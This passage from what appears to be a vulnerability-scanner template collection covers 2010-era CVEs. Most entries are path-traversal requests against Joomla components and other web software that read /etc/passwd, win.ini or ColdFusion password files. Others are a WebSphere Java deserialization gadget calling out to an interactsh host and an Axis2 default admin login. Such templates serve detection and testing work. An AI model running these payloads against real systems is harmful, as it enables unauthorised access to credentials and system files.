ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["SOAP-ENV:Server","<faultcode>"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1980","info":{"name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1717","info":{"name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1540","info":{"name":"Joomla! Component com_blog - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1474","info":{"name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4977","info":{"name":"Joomla! Component Canteen 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1714","info":{"name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0942","info":{"name":"Joomla! Component com_jvideodirect - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1658","info":{"name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1476","info":{"name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1602","info":{"name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1472","info":{"name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-0219","info":{"name":"Apache Axis2 Default Login","severity":"critical"},"requests":[{"raw":["POST /axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginUsername={{username}}&loginPassword={{password}}\n","POST /axis2/axis2-admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserName={{username}}&password={{password}}&submit=+Login+\n"],"payloads":{"username":["admin"],"password":["axis2"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","words":["<h1>Welcome to Axis2 Web Admin Module !!</h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1429","info":{"name":"Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/status?full=true"],"matchers-condition":"and","matchers":[{"type":"word","words":["JVM","memory","localhost/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2259","info":{"name":"Joomla! Component com_bfsurvey - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File 